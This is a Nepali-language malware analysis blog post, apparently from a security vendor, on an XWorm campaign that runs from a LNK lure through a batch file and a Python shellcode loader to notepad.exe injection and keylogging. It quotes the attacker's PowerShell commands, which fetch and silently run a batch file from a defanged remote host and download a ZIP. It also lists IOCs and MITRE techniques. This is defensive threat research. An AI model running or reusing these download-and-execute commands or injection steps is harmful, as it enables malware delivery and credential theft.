• उत्पादन र सेवाहरू
        • बादल

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • प्रेममा

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • प्लेटफर्म

          • Malware Analysis Platform
        • लघु व्यापार

          • SOHO Total Edition
        • सेवा

          • Threat Intel
          • Digital Risk Protection Services (डीआरपीएस)
          • Ransomware Recovery as a Services (आरआरएएस)
          • DPDP Compliance
          • Managed Detection and Response
          • साइबर सुरक्षा र Data Privacy जागरूकता
  • समाधान
    • BFSI
    • शिक्षा
    • सरकार
    • स्वास्थ्य
    • आईटीईएस
    • विनिर्माण
  • कम्पनी
    • हाम्रो बारेमा Seqrite
    • नेतृत्व
    • पुरस्कार र प्रमाणपत्र
    • समाचार कक्ष
  • भागीदार
    • साझेदार कार्यक्रम
    • साझेदार खोज्नुहोस्
    • साझेदार बन्नुहोस्
  • समर्थन
  • स्रोतहरू
    • ब्लग
    • Whitepapers
    • डेटासेटहरू
    • मामला अध्ययन
    • धम्की रिपोर्टहरू
    • नियमावली
    • PoV
    • बुझ्नका Data Privacy
    • तपाईंको जोखिम स्कोर जाँच गर्नुहोस्
    • DPDP संवादहरू
    • गोपनीयता समय
Seqrite ल्याब ब्लग
संपर्क सेल्स आक्रमणमा?
  • उत्पादन र सेवाहरू
        • बादल

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • प्रेममा

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • प्लेटफर्म

          • Malware Analysis Platform
        • लघु व्यापार

          • SOHO Total Edition
        • सेवा

          • Threat Intel
          • Digital Risk Protection Services (डीआरपीएस)
          • Ransomware Recovery as a Services (आरआरएएस)
          • DPDP Compliance
          • Managed Detection and Response
          • साइबर सुरक्षा र Data Privacy जागरूकता
  • समाधान
    • BFSI
    • शिक्षा
    • सरकार
    • स्वास्थ्य
    • आईटीईएस
    • विनिर्माण
  • कम्पनी
    • हाम्रो बारेमा Seqrite
    • नेतृत्व
    • पुरस्कार र प्रमाणपत्र
    • समाचार कक्ष
  • भागीदार
    • साझेदार कार्यक्रम
    • साझेदार खोज्नुहोस्
    • साझेदार बन्नुहोस्
  • समर्थन
  • स्रोतहरू
    • ब्लग
    • Whitepapers
    • डेटासेटहरू
    • मामला अध्ययन
    • धम्की रिपोर्टहरू
    • नियमावली
    • PoV
    • बुझ्नका Data Privacy
    • तपाईंको जोखिम स्कोर जाँच गर्नुहोस्
    • DPDP संवादहरू
    • गोपनीयता समय
गृहपृष्ठ  /  प्राविधिक  / XWorm: पुरानो पेलोडको साथ नयाँ संक्रमण रणनीतिहरूको विश्लेषण गर्दै
XWorm: पुरानो पेलोडको साथ नयाँ संक्रमण रणनीतिहरूको विश्लेषण
04 डिसेम्बर 2024

XWorm: पुरानो पेलोडको साथ नयाँ संक्रमण रणनीतिहरूको विश्लेषण

द्वारा लिखित रुमाना सिद्दीकी
रुमाना सिद्दीकी
प्राविधिक
1

परिचय:

आक्रमणकारीहरूले प्रणालीहरूलाई संक्रमित गर्न र संवेदनशील जानकारी चोर्न निरन्तर विभिन्न प्रविधिहरू विकास गरिरहेका छन्। हालैको अभियानले बहु-चरण संक्रमण श्रृंखलालाई समर्थन गर्दछ जुन LNK फाइलबाट सुरु हुन्छ, जसले पीडितलाई वेब ब्राउजरमा इनभ्वाइस खोल्न लोभ्याउँछ। पृष्ठभूमिमा, यसले XWorm मार्फत प्रणालीलाई संक्रमित गर्ने दुर्भावनापूर्ण गतिविधिहरूको श्रृंखला प्रदर्शन गर्दछ।

यस ब्लगमा, हामी XWorm को प्राविधिक विवरणहरू अन्वेषण गर्नेछौं। प्रारम्भिक विश्लेषणमा हामी LNK फाइलबाट सुरु गर्दै संक्रमण शृङ्खलाका विभिन्न चरणहरूको जाँच गर्नेछौं। त्यसपछि हामी रणनीति, प्रविधि र प्रक्रियाहरू (TTPs) मा हेर्नेछौं, जस्तै PowerShell को प्रयोग, पाइथन स्क्रिप्ट र खतरा अभिनेता द्वारा प्रयोग गरिएको पेलोडहरू। र अन्तमा, XWorm पेलोडको शेलकोड इन्जेक्सनलाई सहज बनाउने विधिहरू पनि हेर्नेछौं। यहाँ आक्रमणकारीले पुरानो भेरियन्ट प्रयोग गर्दछ जसमा XWorm को नयाँ भेरियन्ट जस्तै कार्यक्षमता छ, बाहेक यस भेरियन्टमा Xlogger मोड्युल छ।

संक्रमण चेन:

हालसालै, हामीले LNK फाइल भेट्टायौं जसले वेब ब्राउजरमा इनभ्वाइस खोलेर पीडितलाई लोभ्याउँछ। पृष्ठभूमिमा, यसले ZIP फाइल डाउनलोड गर्छ। जसमा पाइथन सेटअप फाइलहरू छन्। निकाल्दा यसमा पाइथन सेटअप फाइलहरू र विभिन्न स्क्रिप्टहरू छन्। स्क्रिप्ट फोल्डरमा, एउटा दुर्भावनापूर्ण स्क्रिप्ट "Man.py" पाइन्छ जुन प्रणालीमा दुर्भावनापूर्ण शेलकोड डिक्रिप्ट र इन्जेक्ट गर्न जिम्मेवार छ।

चित्र १: संक्रमण शृङ्खला

LNK फाइल:

LNK फाइलले PowerShell कमाण्डलाई लुकेको मोडमा कार्यान्वयन गर्छ; PowerShell कमाण्डको मद्दतले, यसले ब्याच फाइल man.bat लाई डाउनलोड फोल्डरमा प्रतिलिपि गर्छ र त्यसपछि यसले Start-Process प्रयोग गरेर पृष्ठभूमिमा यो ब्याच फाइललाई कार्यान्वयन गर्छ। यसले कमाण्ड प्रम्प्ट विन्डो देखा नपरोस् भनेर सुनिश्चित गर्न -WindowStyle हिडन फ्ल्याग प्रयोग गर्छ।

" 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w लुकेको -c “Copy-Item '\\louise-monitor-mo-rating[.]trycloudflare[.]com@SSL\DavWWWRoot\man[.]bat' \”$env:USERPROFILE\Downloads\”; सुरु-प्रक्रिया \”$env:USERPROFILE\Downloads\man[.]bat\” -WindowStyle लुकेको”

"

 

चित्र २: LNK फाइल र यो लक्ष्य

 

ब्याट फाइल:

डाउनलोड गरिएको .bat फाइल संक्रमण प्रक्रिया सुरु गर्न जिम्मेवार छ। यसले वेब ब्राउजरमा कर बीजक खोलेर पीडितको ध्यान भंग गर्छ।

.bat फाइलमा एउटा लिङ्क हुन्छ जसले PDF फाइलको सुरुवात सुरु गर्छ। यसबाहेक, यसले ZIP फाइल डाउनलोड गर्न, यसको सामग्री निकाल्न, फोल्डरमा नेभिगेट गर्न र पाइथन स्क्रिप्ट चलाउन PowerShell आदेश कार्यान्वयन गर्छ जसले प्रणालीमा खराब शेलकोड इन्जेक्ट गर्छ।

ZIP फाइल डाउनलोड गर्नुहोस्:

पावरशेल -कमान्ड “& { [नेट.सर्भिसपोइन्टम्यानेजर]::सेक्युरिटीप्रोटोकल = [नेट.सेक्युरिटीप्रोटोकलटाइप]::Tls12; इनभ्वोक-वेबरक्वेस्ट -उरी '%जिपयूआरएल%' -आउटफाइल '%डेस्टिनेशन%' }”

यसले हार्डकोडेड URL बाट फाइल डाउनलोड गर्न `Invoke-WebRequest` प्रयोग गर्छ र यसलाई %destination% मा बचत गर्छ जुन यो डाउनलोड स्थानमा छ।

सोही डाउनलोड फोल्डरमा PowerShell आदेश प्रयोग गरेर ZIP फाइल निकाल्नुहोस्।

पावरशेल -कमान्ड “& { विस्तार-संग्रह -पथ '%गन्तव्य%' -गन्तव्यमार्ग '%अर्काक्टटु%' -फोर्स }

ZIP फाइल निकालेपछि, यो man.py भएको फोल्डरमा जान्छ र यसलाई कार्यान्वयन गर्छ।

चित्र ३: ब्याट फाइल

चित्र ४ मा, हामी डाउनलोड फोल्डरमा “qfv4ao” नामक ZIP फाइल डाउनलोड भएको देख्न सक्छौं, वेब ब्राउजरले pdf फाइल खोलिरहेको छ (चित्र ५) र फाइल अनजिप गर्न PowerShell प्रयोग गरिएको छ (चित्र ६)।

 

 

चित्र ६: ब्याट फाइलमा जिप डिक्रिप्ट गर्न पावरशेल आदेश हुन्छ

 

पाइथन स्क्रिप्ट:

पाइथन स्क्रिप्टमा इन्क्रिप्टेड शेलकोड हुन्छ। यो शेलकोड Base64 द्वारा डिक्रिप्ट गरिएको छ र त्यसपछि RC4 डिक्रिप्शन गरिन्छ, जसमा स्क्रिप्टमा नै कि हार्डकोड गरिएको हुन्छ। यसले VirtualProtect प्रयोग गरेर आवंटित मेमोरीको अनुमति परिवर्तन गर्दछ जुन तपाईंले चित्र नम्बर ७ मा देख्न सक्नुहुन्छ।

चित्र ७: शेलकोड भएको पाइथन फाइल

 

इंजेक्शन:

पाइथन स्क्रिप्टले पहिले शेलकोडको कार्यान्वयन अनुमति सेट गर्छ र त्यसपछि शेल कोड कार्यान्वयन गर्छ। शेलकोडको सुरुवाती प्रकार्यले पेलोडको डिक्रिप्शन र कार्यान्वयनको ख्याल राख्यो, जुन XWorm हो। तलको चित्र ८ मा, हामी शेलकोड इंजेक्शनको अनुक्रम देख्न सक्छौं।

चित्र ८: शेलकोड

चित्र ८ मा, हामी PAGE_EXECUTE_READWRITE को अनुमति लिएर शेलकोड देख्न सक्छौं । त्यसपछि चित्र ९ मा शेलकोडको कार्यान्वयन हुन्छ। शेलकोड सुरु गर्दा कोडका केही बाइटहरू "notepad.exe" मा शेलकोड इन्जेक्सनको लागि जिम्मेवार हुन्छन्।

चित्र ९: शेलकोडको कार्यान्वयन

 

चित्र १०: शेलकोड इंजेक्शन

 

चित्र ११: Notepad.exe सुरु भएको छ

पाइथन स्क्रिप्ट man.py कार्यान्वयन गरेपछि, चित्र ११ ले देखाउँछ कि "notepad.exe" सुरु भएको छ। पहिले, notepad.exe निलम्बित अवस्थामा सुरु हुन्छ। त्यसपछि, मेमोरी आवंटन र शेलकोड सम्मिलन notepad.exe को ठेगाना ठाउँमा गरिन्छ जुन चित्र १२ र १३ मा देखाइएको छ।

शेलकोड सम्मिलित भएपछि, एउटा एसिन्क्रोनस प्रोसिजर कल (APC) notepad.exe मा क्युमा राखिन्छ। यो APC ले त्यो ठेगानालाई औंल्याउँछ जहाँ दुर्भावनापूर्ण कोड मेमोरीमा रहन्छ। जब notepad.exe लाई यसको निलम्बित अवस्थाबाट पुन: सुरु गरिन्छ, APC ले दुर्भावनापूर्ण कोडको कार्यान्वयनलाई ट्रिगर गर्दछ।

चित्र १२: इन्जेक्टेड शेलकोड

 

चित्र १३. डिक्रिप्ट गरिएको शेलकोड जुन Xworm हो

PE फाइल:

XWorm को यो संस्करण पुरानो संस्करण हो जुन अझै पनि सक्रिय छ र प्रणालीलाई संक्रमित गर्न नयाँ रणनीतिहरू प्रयोग गर्दछ। यस संस्करणमा, यसले mutex सिर्जना गरेपछि तुरुन्तै 'callk' नामक Xlogger प्रकार्यलाई कल गर्दछ। यो Xlogger मोड्युलले फाइलहरू खोल्ने, किस्ट्रोकहरू, वेब ब्राउजरको प्रयोग आदि जस्ता सबै घटनाहरू ट्र्याक गर्दछ र यसलाई "Local/Temp/log.txt" मार्गमा भण्डारण गर्दछ। यो c2 सर्भरबाट सम्बन्धित आदेश प्राप्त गर्दा थप स्पष्ट हुन्छ।

चित्र १४: प्रकार्य कल

कीलगिङ:

Keylogger कार्यक्षमता किस्ट्रोकहरू सङ्कलन गर्न र सम्भावित रूपमा संवेदनशील जानकारी जस्तै प्रमाणहरू वा व्यक्तिगत डेटा चोर्न प्रयोग गरिन्छ। तलको स्निपेटमा किस्ट्रोकहरू खिच्न WH_KEYBOARD_LL हुक प्रकारको साथ SetWindowsHookEx जस्ता API हरूको प्रयोग हामी देख्न सक्छौं। यी लग गरिएका किस्ट्रोकहरू स्थानीय रूपमा भण्डारण गर्न वा एक्सफिल्टर गर्न सकिन्छ।

थप रूपमा, GetKeyboardState वा ToUnicodeEx जस्ता प्रकार्यहरू प्रायः कुञ्जी प्रेसहरूलाई पढ्न योग्य पाठमा रूपान्तरण गर्न प्रयोग गरिन्छ, जसले गर्दा हालको किबोर्ड लेआउटको हिसाब गरिन्छ।

चित्र १५: किलगिङ मोड्युल

निष्कर्ष:

यस ब्लगमा हामीले संक्रमण शृङ्खलाको वर्णन गरेका छौं जसले पीडितको प्रणालीलाई संक्रमित गर्न विभिन्न प्रविधिहरूको प्रयोग गर्ने परिष्कृत, बहु-चरणीय मालवेयर आक्रमणलाई हाइलाइट गर्दछ। दुर्भावनापूर्ण LNK फाइल, PowerShell आदेशहरू, ब्याच फाइल, पाइथन स्क्रिप्टहरू, र मेमोरी इन्जेक्सनको संयोजन प्रयोग गरेर, मालवेयरले एकल प्रम्प्ट बिना नै आफ्नो पेलोड सफलतापूर्वक तैनाथ गर्दछ। शेलकोड इन्जेक्सन र किलगिङ सहित मालवेयरको क्षमताहरूले यसलाई लगइन प्रमाणहरू जस्ता संवेदनशील जानकारी चोर्न र टाढाको आक्रमणकारी-नियन्त्रित सर्भरमा एक्सफिल्टरेट गर्न सक्षम बनाउँछ।

 

आईओसीहरू:

MD5

नाम MD5
LNK फाइल 1556BD8155D8E9FF2DBDCD852A354B64
ब्याच फाइल D0B5238A18ABC402B506F608968270DC
जिप C627DE3B90A0FB5CA8964026360B053A
XWorm पेलोड 5EDAB6926E304E4DBEF76800918BEE8A

 

संरक्षण:

 

ट्रोजन.एक्सवर्म.एस३४२५१७०३

ट्रोजन.जेनेरिकएफसी.एस२९९६०९०९

 

मिटर एटीएन्डसीके:

रणनीति प्रविधि ID नाम
Obfuscation T1027 अस्पष्ट फाइलहरू वा जानकारी
कार्यान्वयन T1059.005 कमाण्ड र स्क्रिप्टिङ इन्टरप्रेटर: भिजुअल बेसिक
स्क्रिन क्याप्चर T1113 स्क्रिन क्याप्चर
पीडित आयोजकको जानकारी सङ्कलन गर्नुहोस् T1592 प्रणाली जानकारी सङ्कलन गर्छ
इनपुट क्याप्चर T1056 Keylogging
रक्षा चोरी T1055.002 प्रक्रिया इंजेक्शन: पोर्टेबल एक्जिक्युटेबल इंजेक्शन
सामग्री इंजेक्शन T1659 प्रणालीहरूमा दुर्भावनापूर्ण कोड इन्जेक्ट गर्दै
आदेश र नियन्त्रण T1071.001 एप्लिकेसन लेयर प्रोटोकल: वेब प्रोटोकलहरू

 लेखक:

वैभव कृष्ण बिल्लाडे

रुमाना सिद्दीकी

 अघिल्लो पोस्टविकसित खतराहरू: XWorm मालवेयरको अनुकूली डिजाइन
अर्को पोस्ट  नक्कली वेबसाइटहरू र अनलाइन नक्कलबाट आफ्नो ब्रान्डलाई कसरी जोगाउने...
रुमाना सिद्दीकी

रुमाना सिद्दीकी को बारेमा

रुमाना सिद्दीकी क्विक हिल सेक्युरिटी ल्याब्समा वरिष्ठ सुरक्षा अनुसन्धानकर्ताको रूपमा कार्यरत छिन्। उनी मालवेयर विश्लेषण, रिभर्स इन्जिनियरिङ र अन्वेषणमा जोशिली छिन्...

रुमाना सिद्दीकीका लेखहरू »

सम्बन्धित पोस्ट

  • म्याकसिन्क: क्लिकफिक्स लुर्सको शोषण गर्ने अपमानजनक म्याकोस चोरीकर्ता

    म्याकसिन्क: क्लिकफिक्स लुर्सको शोषण गर्ने अपमानजनक म्याकोस चोरीकर्ता

    सेप्टेम्बर 8, 2026
  • अपरेशन क्विक्सिलभर: चीन-नेक्सस अभिनेताले VHD-डेलिभर गरिएको गो ब्याकडोर मार्फत म्यानमारका कूटनीतिज्ञहरूलाई लक्षित गर्यो

    अपरेशन क्विक्सिलभर: चीन-नेक्सस अभिनेताले VHD-डेलिभर गरिएको गो ब्याकडोर मार्फत म्यानमारका कूटनीतिज्ञहरूलाई लक्षित गर्यो

    अगस्ट 17, 2026
  • विश्वसनीय व्यावसायिक कार्यप्रवाहहरूको दुरुपयोग: एक बहु-चरणीय प्रेत चोरी अभियान

    जुलाई 22, 2026
विशेष लेखकहरू
  • Seqrite
    Seqrite

    Seqrite एक अग्रणी उद्यम साइबर सुरक्षा समाधान प्रदायक हो। ध्यान केन्द्रित गर्दै...

    द्वारा थप लेखहरू पढ्नुहोस् Seqrite
  • बिनेश पी
    बिनेश पी

    म साइबर सुरक्षाको लागि एक जोशिलो उत्साही र समर्पित लेखक हुँ। एउटा सीपको साथ...

    बिनेश पी द्वारा थप लेखहरू पढ्नुहोस्
  • ज्योति कार्लेकर
    ज्योति कार्लेकर

    म एक उत्सुक लेखक हुँ जसलाई उदीयमान प्रविधिहरूको बारेमा सामग्री तयार गर्न मन पर्छ र...

    ज्योति कार्लेकरका थप लेखहरू पढ्नुहोस्
  • संजय काटकर
    संजय काटकर

    संजय काटकर क्विक हिल टेक्नोलोजीजका संयुक्त प्रबन्ध निर्देशक हुन्...

    संजय काटकरका थप लेखहरू पढ्नुहोस्
विषय
अपार्टमेन्ट (25) साइबर आक्रमण (36) साइबर-हमला (58) साइबरटैक (16) cyberattacks (15) Cybersecurity (342) साइबर सुरक्षा (34) साइबर खतरा (33) साइबर खतराहरू (51) डेटा उल्लंघन (56) डाटा उल्लंघन (29) डेटा हानि (28) डाटा हानि रोकथाम (34) data privacy (17) डेटा सुरक्षा (35) डेटा सुरक्षा (19) DLP (50) DPDP (14) DPDPAComment (17) गुप्तिकरण (16) अन्तिम बिन्दु सुरक्षा (113) इन्टरप्राइज सुरक्षा (20) अन्वेषण गर्नुहोस् (13) GDPR (14) मालवेयर (76) मालवेयर विश्लेषण (14) मालवेयर आक्रमण (23) MDM (27) माइक्रोसफ्ट (15) मिटर एटीटी एन्ड सीके (14) नेटवर्क सुरक्षा (26) फिसिङ (30) ransomware (69) ransomware आक्रमण (31) ransomware हमलाहरु (31) ransomware संरक्षण (17) Seqrite (41) Seqrite गुप्तिकरण (27) Seqrite ईपीएस (33) Seqrite सेवा (16) खतरा पत्ता लगाउने (14) Threat Intelलिगेन्स (22) युटिएम (34) विलोपन (16) शून्य विश्वास (13)
Seqrite ल्याब

विश्वव्यापी रूपमा उत्कृष्ट-इन-क्लास खतरा रोकथाम, पत्ता लगाउने, र प्रतिक्रिया समाधानहरूको साथ अन्त्य बिन्दु, डेटा, र नेटवर्क सुरक्षालाई सरलीकृत गर्ने अग्रणी उद्यम IT सुरक्षा समाधान प्रदायक।

थप पढ्नुहोस् Seqrite

हमीलाई पछ्याउनुहोस:

हाम्रो न्यूजलेटरमा सदस्यता लिनुहोस्

नवीनतम साइबर सुरक्षा प्रवृत्ति र अन्तर्दृष्टि बारे जानकारी रहनुहोस्।

लोड
उत्पादन र सेवाहरू
  • बादल
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • प्रेममा
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • प्लेटफर्म
  • Malware Analysis Platform
  • सूक्ष्म व्यवसाय
  • SOHO Total Edition
  • सेवा
  • Threat Intel
  • Digital Risk Protection Services (डीआरपीएस)
  • Ransomware Recovery as a Services (आरआरएएस)
  • DPDP Compliance
  • Managed Detection and Response
  • साइबर सुरक्षा र Data Privacy जागरूकता
स्रोतहरू
  • ब्लग
  • Whitepapers
  • डेटासेटहरू
  • धम्की रिपोर्टहरू
  • नियमावली
  • PoV
  • बुझ्नका Data Privacy
  • DPDP संवादहरू
  • नीति र अनुपालन
  • EULA
  • गोदीप.एआई
  • SIA
  • गोपनीयता समय
सम्पर्क
  • दर्ता भएका कार्यालयहरू
  • साइबर सुरक्षाको कुरा गरौं
समर्थन
  • प्राविधिक समर्थन
  • सफ्टवेयर डाउनलोड गर्नुहोस्
  • अफलाइन अपडेटर
  • फर्मवेयर अपग्रेड
  • अपग्रेड
  • उत्पाद दस्तावेज
हाम्रो बारेमा - CHG
  • हाम्रो बारेमा Seqrite
  • नेतृत्व
  • पुरस्कार र मान्यता
  • समाचार कक्ष
साथी
  • साझेदार कार्यक्रम
  • साझेदार खोज्नुहोस्
  • साझेदार बन्नुहोस्
  • Seqrite प्रमाणीकरण

© २०२५ क्विक हिल टेक्नोलोजीज लिमिटेड

साइटमैप गोपनीयता नीतिहरू कानूनी नोटिस कुकी नीतिहरू प्रयोगको शर्त